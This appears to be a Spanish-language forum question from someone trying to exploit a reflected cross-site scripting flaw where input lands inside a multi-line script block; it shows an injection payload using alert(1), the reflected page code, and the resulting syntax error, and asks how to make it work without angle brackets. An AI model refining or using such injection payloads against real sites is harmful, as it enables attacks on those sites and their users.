Estoy intentando explotar un script de sitio cruzado reflejado en una solicitud GET donde el reflejo está en el primer bloque de script de varias líneas.
Parece que puedo usar todos los caracteres, pero <
, >
y "
y la mejor carga útil que podría encontrar es
/?search='}]%3Balert(1)%3B%2F%2F
Y se refleja así:
<head><script>
dataLayer = [{
'pageType': 'Page',
'category': 'Search',
'searchTerm': ''}];alert(1);//',
'searchResults': '0',
}];
</script>
Lamentablemente esto no funciona. Tampoco lo hace con / * en lugar de // para comentar el resto del bloque de script. ¿Hay alguna forma de hacerlo funcionar sin usar "<" y ">"? Ahora falla con "SyntaxError: token inesperado: ':'"